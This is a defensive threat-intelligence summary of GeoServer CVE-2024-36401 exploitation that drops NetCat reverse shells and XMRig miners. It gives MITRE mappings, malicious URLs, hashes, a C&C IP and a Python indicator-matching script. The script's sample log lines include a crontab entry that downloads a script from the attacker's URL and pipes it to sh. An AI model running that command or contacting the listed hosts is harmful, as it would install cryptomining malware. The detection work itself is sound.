The unpatched GeoServer vulnerability CVE-2024-36401 continues to be exploited by threat actors to install malware such as NetCat and XMRig CoinMiner, with confirmed cases in South Korea. Attackers use PowerShell and Bash scripts to deploy these malicious tools, enabling remote control and cryptocurrency mining. #GeoServer #CVE202436401 #NetCat #XMRig
Keypoints
- GeoServer’s remote code execution vulnerability CVE-2024-36401 allows unauthorized users to execute malicious code and install malware.
- Threat actors frequently scan for unpatched GeoServer installations and exploit them to deploy CoinMiner and other malware.
- In South Korea, vulnerable GeoServer instances running on Windows were exploited to install NetCat and XMRig CoinMiner via PowerShell commands.
- NetCat is used as a reverse shell to maintain remote access and control over compromised systems.
- XMRig, a cryptocurrency miner, is installed using both PowerShell on Windows and Bash scripts on Linux, with persistence maintained through Cron jobs on Linux.
- The malware uses system resources for mining Monero and can facilitate further malicious activities such as data theft or additional malware installation.
- Indicators of compromise include specific file hashes, URLs, and IP addresses related to the coin miner deployment infrastructure.
MITRE Techniques
- [T1059] Command and Scripting Interpreter – Used PowerShell and Bash scripts for malicious code execution and malware installation (“PowerShell command responsible for downloading a downloader”, “Bash script to install XMRig”).
- [T1566] Phishing – Earth Baxia threat actor used spear-phishing in related campaigns exploiting CVE-2024-36401 (“attack campaign by Earth Baxia threat actor, which involved exploiting the CVE-2024-36401 vulnerability for spear-phishing”).
- [T1071] Application Layer Protocol – NetCat used to establish reverse shell connections to the C&C server for command execution (“NetCat executed via the ‘-e’ argument connects to the C&C server and operates as a reverse shell”).
- [T1543] Create or Modify System Process – Bash script registers commands to Cron jobs to maintain persistence on Linux systems (“The Bash script also registers commands to Cron jobs for maintaining persistence”).
Indicators of Compromise
- [MD5 Hash] Malware samples – 0b3744373c32dc6de80dfc081200d9f8, 310c17c19e90381114d47914bcb3ccf2, and 3 more hashes
- [URL] CoinMiner and script distribution – http://182.218.82.14/js/1/gw.txt, http://182.218.82.14/js/1/startup.sh, and 3 more URLs
- [IP Address] Command and Control server – 107.180.100.247
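The IoC list above is the part of this summary a defender can act on directly. The following Python script is an added example, not code from the AhnLab report: it loads the hashes, URLs and IP addresses listed on this page (the report's remaining indicators are not reproduced here, so they are not included), extracts candidate IPs, URLs and MD5 hashes from arbitrary text lines, and reports every match. The proxy, EDR, firewall and crontab lines it scans are constructed sample input, including the hostname, file path and timestamps, and are not taken from the report.

```python
import re
from collections import Counter
from typing import Iterable

# Indicators copied from the IoC list above (only the ones shown on the page).
IOC_MD5 = {
    "0b3744373c32dc6de80dfc081200d9f8",
    "310c17c19e90381114d47914bcb3ccf2",
}
IOC_URLS = {
    "http://182.218.82.14/js/1/gw.txt",
    "http://182.218.82.14/js/1/startup.sh",
}
IOC_IPS = {"182.218.82.14", "107.180.100.247"}

# Extractors for the three indicator types present on the page.
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
MD5_RE = re.compile(r"\b[0-9a-fA-F]{32}\b")
URL_RE = re.compile(r"https?://[^\s\"']+")


def match_iocs(lines: Iterable[str]) -> list[tuple[int, str, str]]:
    """Return (line_number, ioc_type, value) for every IoC hit in `lines`.

    Line numbers are 1-based. Hashes are normalised to lowercase and trailing
    punctuation is stripped from URLs so that log-formatting noise does not
    hide a match. Works on any text: proxy logs, EDR events, crontab dumps.
    """
    hits: list[tuple[int, str, str]] = []
    for n, line in enumerate(lines, start=1):
        for ip in IP_RE.findall(line):
            if ip in IOC_IPS:
                hits.append((n, "ip", ip))
        for url in URL_RE.findall(line):
            url = url.rstrip(".,;")
            if url in IOC_URLS:
                hits.append((n, "url", url))
        for digest in MD5_RE.findall(line):
            digest = digest.lower()
            if digest in IOC_MD5:
                hits.append((n, "md5", digest))
    return hits


def summarise(hits: list[tuple[int, str, str]]) -> dict[str, int]:
    """Count hits per indicator type, e.g. {"ip": 3, "url": 2, "md5": 1}."""
    return dict(Counter(ioc_type for _, ioc_type, _ in hits))


# Constructed sample input (not from the report): a proxy request for the
# downloader, an EDR file-creation event carrying the sample's MD5, a firewall
# record of an outbound connection to the C&C address, a crontab entry that
# pulls the Linux installer script, and one benign line that must not match.
SAMPLE_LINES = [
    "2024-09-10T03:12:44Z proxy src=10.0.0.21 method=GET "
    "url=http://182.218.82.14/js/1/gw.txt status=200",
    "2024-09-10T03:12:50Z edr host=ws01 event=file_create "
    "path=C:\\Users\\Public\\gw.exe md5=0B3744373C32DC6DE80DFC081200D9F8",
    "2024-09-10T03:13:02Z fw action=allow src=10.0.0.21 dst=107.180.100.247 proto=tcp",
    '*/10 * * * * /bin/sh -c "curl -s http://182.218.82.14/js/1/startup.sh | sh"',
    "2024-09-10T03:14:00Z proxy src=10.0.0.22 method=GET "
    "url=http://example.invalid/index.html status=200",
]

if __name__ == "__main__":
    found = match_iocs(SAMPLE_LINES)
    for line_no, ioc_type, value in found:
        print(f"line {line_no}: {ioc_type} {value}")
    print(summarise(found))
```

Because the matcher takes any iterable of strings, the same function can be pointed at `sys.stdin`, a rotated log file or the output of `crontab -l` on a Linux host suspected of running the XMRig installer; a hit on the `startup.sh` URL inside a cron entry is the persistence mechanism the report describes.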
Read more: https://asec.ahnlab.com/en/88917/